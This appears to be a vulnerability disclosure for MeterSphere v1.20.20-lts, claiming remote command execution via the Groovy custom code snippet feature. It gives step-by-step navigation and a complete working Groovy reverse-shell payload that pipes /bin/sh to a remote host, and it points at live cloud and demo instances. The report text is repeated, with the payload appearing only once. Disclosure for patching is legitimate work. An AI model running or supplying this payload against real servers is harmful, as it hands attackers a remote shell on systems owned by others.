Summary
Metersphere v1.20.20-lts-79d354a6 is vulnerable to Remote Command Execution. The system command reverse-shell can be executed at the custom code snippet function of the metersphere system workbench
Register account - enter the workbench
https://www.metersphere.com/index
Provide test account :
login and click enter the workbench
then splicing into https://cloud2.metersphere.com/#/project/code/segment
The system command reverse-shell can be executed at the custom code snippet function of the metersphere system workbench
Description
metersphere can realize RCE through custom func code
The location is at Workbench-Project Settings-Custom Code Snippets
Project Settings - Custom Code Snippet Select the groovy code and enter the following to receive the bounced shell
// PoC.js
groovy codes
String host="*.*.*.*";int port=42239;String cmd="/bin/sh";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
https://cloud.metersphere.com/#/project/code/segment
https://demo.metersphere.com/#/project/code/segment
view pic example:
https://hacku.top/wl/?id=WTuOyEeDyj2JsO5Toxd8wr242chVgSc1
https://hacku.top/wl/?id=Z2VBfKJZ2Fx0vMoXEVGo8EzMHAdlVlau
Summary
Metersphere v1.20.20-lts-79d354a6 is vulnerable to Remote Command Execution. The system command reverse-shell can be executed at the custom code snippet function of the metersphere system workbench
Register account - enter the workbench
https://www.metersphere.com/index
Provide test account :
login and click enter the workbench
then splicing into https://cloud2.metersphere.com/#/project/code/segment
The system command reverse-shell can be executed at the custom code snippet function of the metersphere system workbench
Description
metersphere can realize RCE through custom func code
The location is at Workbench-Project Settings-Custom Code Snippets
Project Settings - Custom Code Snippet Select the groovy code and enter the following to receive the bounced shell
// PoC.js
groovy codes
https://cloud.metersphere.com/#/project/code/segment
https://demo.metersphere.com/#/project/code/segment
view pic example:
https://hacku.top/wl/?id=WTuOyEeDyj2JsO5Toxd8wr242chVgSc1
https://hacku.top/wl/?id=Z2VBfKJZ2Fx0vMoXEVGo8EzMHAdlVlau